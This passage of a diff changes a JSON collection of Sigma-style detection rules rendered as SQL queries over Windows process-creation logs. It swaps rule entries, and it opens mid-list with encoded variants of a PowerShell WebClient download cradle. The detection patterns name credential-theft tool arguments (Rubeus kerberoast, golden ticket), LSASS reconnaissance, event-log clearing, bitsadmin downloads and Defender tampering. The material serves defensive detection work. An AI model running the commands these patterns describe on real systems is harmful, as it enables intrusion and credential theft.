ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE 
'%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE 
'%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE 
'%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE 
'%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Potential Defense Evasion Via Binary Rename", - "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", + "description": "Detects a suspicious RDP session redirect using tscon.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 
'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", + "title": "Potential Windows Defender Tampering Via Wmic.EXE", + "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE 
'%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" ], - "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "Suspicious VBoxDrvInst.exe Parameters", - "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", - "status": "test", - "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", - "author": "Konstantin Grishchenko, oscd.community", + "title": "Recon Information for Export with Command Prompt", + "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "status": "experimental", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tree.com' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\doskey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" + 
"filename": "proc_creation_win_susp_recon.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", - "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "status": "stable", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' 
ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", + "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", + "status": "experimental", + "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.persistence", + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Installation of unsigned packages for testing purposes" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% 
/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "title": "Exploit for CVE-2017-0261", + "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "status": "test", + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Several false positives identified, check for suspicious file names or locations (e.g. 
Temp folders)" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_exploit_cve_2017_0261.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "title": "Suspicious SysAidServer Child", + "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" + }, + { + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. 
This could be used to establish persistence", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate software creating script event consumers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", - "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" 